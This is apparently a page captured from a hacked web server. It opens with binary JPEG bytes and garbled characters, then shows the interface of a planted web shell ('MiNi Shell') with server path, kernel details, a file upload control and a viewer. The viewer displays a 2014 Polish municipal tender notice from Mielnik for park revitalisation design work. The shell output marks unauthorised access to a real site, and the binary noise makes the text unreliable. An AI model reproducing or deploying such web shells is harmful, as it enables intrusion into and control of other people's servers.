JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140124/29006-N-2014.html

<p class="kh_header"><b>Mielnik: USŁUGA WYKONANIA DOKUMENTACJI PROJEKTOWEJ DLA ZADANIA PN.: REWITALIZACJA CENTRUM MIEJSCOWOŚCI MIELNIK</b><br>
<b>Numer ogłoszenia: 29006 - 2014; data zamieszczenia: 24.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mielnik , ul. Piaskowa 38, 17-307 Mielnik, woj. podlaskie, tel. 085 6577003, faks 085 6577121.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mielnik.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA WYKONANIA DOKUMENTACJI PROJEKTOWEJ DLA ZADANIA PN.: REWITALIZACJA CENTRUM MIEJSCOWOŚCI MIELNIK.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej dla zadania rewitalizacji centrum miejscowości Mielnik na działce ewidencyjnej nr 6002 w Mielniku.

Zamawiający planuje w 2014 roku realizację zadań zdefiniowanych w projekcie współfinansowanym z Programu Rozwoju Obszarów Wiejskich na lata 2007-2013 pn. Rewitalizacja centrum miejscowości Mielnik i Radziwiłłówka, w ramach którego wykona m. in. rewitalizację placu parkowego położonego w centrum Mielnika.
Celem zamówienia jest zaprojektowanie przestrzeni publicznej, która będzie charakteryzo-wała się dostępnością, otwartością i walorami rekreacyjno - estetycznymi. Teren wskazany jako zakres zamówienia objęty jest ochroną konserwatora zabytków w zakresie układu przestrzennego. 
5Przedmiot zamówienia obejmuje dz. geodezyjne nr 6002 o pow. ok.0,74 ha z ingerencją w otaczające drogi na działkach geodezyjnych: 6241/2, 6003 i 6266. 
Przedmiot zamówienia zostaje podzielony na dwie części: Część 1: Opracowanie dokumentacji projektowej i dokonanie zgłoszenia robót utwardzenia części powierzchni działki nr 6002 oraz opracowanie dokumentacji projektowej (wykonawczej) w oparciu o będący w posiadaniu Zamawiającego projekt budowlany małej architektury tj. o roboty, na które zamawiający dokonał zgłoszenia robót budowlanych, kompatybilne z wnioskiem o dofinansowanie inwestycji pn. Rewitalizacja centrum miejscowości Mielnik i Radziwiłłówka. 
W zakres pierwszej części wchodzi opracowanie niezbędnej dla realizacji inwestycji dokumentacji projektowej i dokonanie (w imieniu i na rzecz Zamawiającego) zgłoszenia robót budowlanych wraz z przedłożeniem niezbędnych załączników w odpowiedniej instytucji w związku z planowanymi pracami obejmującymi:

-uporządkowanie przestrzeni parku poprzez wykonanie projektu zieleni tj. zaplanowanie ewentualnej wycinki zbędnej roślinności oraz planu nasadzeń roślin; gatunki i ilość roślin zostanie uzgodniona na etapie prac koncepcyjnych w porozumieniu z zamawiającym. Obecnie na terenie Parku w Mielniku znajduje się nieregularna roślinność niska i wysoka.
-wprowadzenie w przestrzeń parku szeregu elementów architektury ogrodowej takiej jak: 
3 stanowiska do gier (szachy/warcaby/chińczyk), wymiana ławeczek i koszy, stojaki na rowery, donice na kwiaty - ilość i miejsca umiejscowienia tych elementów należy uzgodnić z zamawiającym na etapie koncepcji,
-prace renowacyjne dot. pomnika umiejscowionego na terenie parku w formie kamienia pamiątkowego z tablicą upamiętniającą 500-lecie wydarzeń z 23 października 1501 roku (Unia Mielnicka), między innymi poprzez: piaskowanie, odnowę tablicy pamiątkowej. Należy rozważyć podświetlenie głazu.
-odseparowanie przestrzeni parku od strony ulicy Brzeskiej stosując słupki z łańcuchami (w tym samym systemie ogrodzenia należy wydzielić ruiny piwnicy budynku znajdującego się w parku,
-remont układu komunikacyjnego poprzez budowę lub przebudowę ciągów pieszych i azyli w przestrzeni parku w powiązaniu z przyległymi drogami. Materiał i charakter układu do uzgodnienia z Zamawiającym,
* przy opracowywaniu dokumentacji należy uwzględnić umiejscowiony na terenie parku  info-kiosk dofinansowany z POIG w ramach projektu Bug rajem dla turysty, który należy wkomponować w całość opracowania, bez zmiany jego lokalizacji.
Część 2: Opracowanie dokumentacji budowlano-wykonawczej dla obiektów budowlanych wymienionych w niniejszym zamówieniu, dla których obowiązkowe jest uzyskanie pozwolenia na budowę oraz robót budowlanych nieujętych w 1 części zamówienia, dla których konieczne jest dokonanie zgłoszenia robót budowlanych.

W zakres realizacji drugiej części wchodzi opracowanie dokumentacji projektowej oraz uzyskanie w imieniu i na rzecz Zamawiającego niezbędnych decyzji i pozwoleń związanych z niżej wymienionymi elementami: 
-prace remontowe przy ruinach budynku zlokalizowanego na działce nr 6002, w jej północno-wschodniej części, takich jak: oczyszczenie z zewnątrz i wewnątrz, odsłonięcie ścian i okien piwnicy, starych fundamentów oraz innych elementów piwnicy. Należy za-planować oświetlenie ruin z zewnątrz i ew. wewnątrz oraz ich ogrodzenie ogrodzeniem łańcuchowym. Z wraz z zaplanowaniem ciągów pieszych, wraz z opisami historycznymi, zamieszczonymi na podświetlanych tablicach informacyjnych. W posiadaniu zamawiającego są opisy i zdjęcia budynku, które zostaną udostępnione jako ewentualne materiały do opracowania treści tablic informacyjnych,
-oświetlenie terenu (korzystając z istniejącego złącza kablowego na dz. 6002) poprzez zastosowanie lamp parkowych. Stworzenie miejsca umiejscawiania dekoracji świątecznych takich jak choinka, świetlnych stojących elementów świątecznych, itp.
-stworzenie miejsca ekspozycji głazów narzutowych. W oparciu o będące w posiadaniu Zamawiającego twory polodowcowe (kamienie) planuje się stworzyć około 6 ekspozycji z informacją o ich powstaniu, lokalizacji i historii, każdy głaz powinien posiadać tablicę informacyjną.
-Dokumentację projektową należy sporządzić zgodnie z rozporządzeniem Ministra Infra-struktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U z 2004r. nr 202 z późn. zm)
--Zamawiający przekaże Wykonawcy wybranemu w niniejszym postępowaniu wytyczne niezbędne do wykonania zamówienia - tj. doprecyzowanie, uszczegółowienie, umiejscowienie elementów, jakie Zamawiający planuje zlokalizować w przestrzeni parkowej. Elementy wymienione w punkcie 6 mogą ulec zmianie lub modyfikacjom w trakcie realizacji zamówienia ze względu na czynniki niezależne od Zamawiającego, niemożliwe do przewidzenia na etapie ogłoszenia postępowania.
--Zamawiający powierzy wybranemu w postępowaniu Wykonawcy sporządzenie opisu przedmiotu zamówienia planowanego do ogłoszenia postępowaniem o udzielenie zamówienia publicznego na wykonanie rewitalizacji przestrzeni na podstawie projektu opracowanego w wyniku niniejszego postępowania.

--W skład zamawianej dokumentacji projektowej, w koszt wykonania zadania wchodzą między innymi:
-	mapy do celów projektowych z zakresem niezbędnym do realizacji,
-	wykonanie inwentaryzacji dendrologicznej, na podstawie której uzyskane zostaną decyzje wycinki (usunięcia) zbędnej roślinności,
-	uzyskanie staraniem wykonawcy i na koszt wykonawcy wszystkich niezbędnych opinii, warunków i decyzji umożliwiających wykonanie wymienionych robót budowlanych, w tym opinii konserwatora zabytków,
-	występowanie przed wszystkimi organami administracji publicznej jako pełnomocnik Zamawiającego celem wykonania przedmiotu zamówienia, w szczególności uzyskania decyzji pozwolenia na budowę oraz dokonania zgłoszenia robót budowlanych,
-	projekty budowlane i wykonawcze,
-	opracowanie przedmiarów i kosztorysów robót objętych projektem, niezbędnych do ogłoszenia postępowania o udzielenie zamówienia publicznego i spełniających warunki wskazane w ustawie Prawo Zamówień Publicznych, zwłaszcza w art. 29 ust. 3.
-	pełnienie nadzoru autorskiego zgodnie z obowiązkiem wynikającym z ustawy Prawo Budowlane.
--	Dokumentację należy przygotować w czterech egzemplarzach w formie papierowej oraz w formie elektronicznej w jednym egzemplarzu na płycie CD/DVD.
--	Wykonawca odpowiada za wady dokumentacji projektowej również po przyjęciu przez Zamawiającego przedmiotu zamówienia i zapłacie za jego wykonanie. W sytuacji takiej, Wykonawca zobowiązany jest dokonać niezbędnych korekt i poprawek w nieprzekraczalnym terminie 14 dni, od dnia przekazania wezwania do poprawek lub korekt.
--	Wykonawca zobowiązany będzie do jednorazowej aktualizacji kosztorysu inwestorskiego na wezwanie Zamawiającego, bez dodatkowego wynagrodzenia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 180.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w ciągu ostatnich 3 lat (słownie: trzech lat) przed upływem terminu składania ofert wykonał nie mniej niż 1 (słownie: jedną) usługę projektowania przestrzeni, w skład której wchodziło zagospodarowanie przestrzeni zielonej terenu o powierzchni nie mniejszej niż 300 m2.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony na podstawie oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać dysponowanie osobami zdolnymi do wykonania zamówienia po-siadającymi uprawnienia budowlane do projektowania bez ograniczeń (co najmniej po 1 osobie dla każdej specjalności): w specjalności architektonicznej, oraz w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony na podstawie oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki zmiany umowy: 
Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących okolicznościach, niemożliwych do przewidzenia w dniu zawarcia umowy, a mianowicie termin może ulec zmianie w przypadku:
1) wystąpienia okoliczności nie zawinionych przez strony, których nie można było wcześniej przewidzieć, tj. m.in.:
a) przedłużenia się uzgodnień zewnętrznych przez podmioty do tego upoważnione,
b) konieczności wprowadzenia zmian projektowych lub technologicznych, nie zawinionych przez Wykonawcę lub Zamawiającego;
c) pojawienia się nowych, nieznanych z momencie ogłoszenia zamówienia wytycznych ze strony instytucji/podmiotów zewnętrznych uprawnionych do wydawania opinii w sprawie.
d) może nastąpić zmiana personelu Wykonawcy lub Zamawiającego, w przypadku, gdy Wykonawca lub Zamawiający nie będzie mógł skierować do wykonania zamówienia personelu wskazanego w ofercie, przy czym nowe osoby muszą spełniać warunki określone w SIWZ dla personelu;
e) zmiany obowiązujących przepisów prawa, która powoduje, że konieczne dla prawidłowego zrealizowania przedmiotu zamówienia stanie się dokonanie zmiany umowy lub zakresu prac projektowych;
2) wystąpienia obiektywnych okoliczności, które powodują, że dokonanie zmiany byłoby korzystne dla Zamawiającego.
4. Zmiana postanowień zawartej umowy wymaga dochowania formy pisemnej pod rygorem nieważności i będzie dokonana w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.ug.mielnik.wrotapodlasia.pl/informacje/przetargi/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Mielnik, 17-307 Mielnik, ul. Piaskowa 38.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.02.2014 godzina 12:00, miejsce: Urząd Gminy Mielnik, 17-307 Mielnik, ul. Piaskowa 38.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com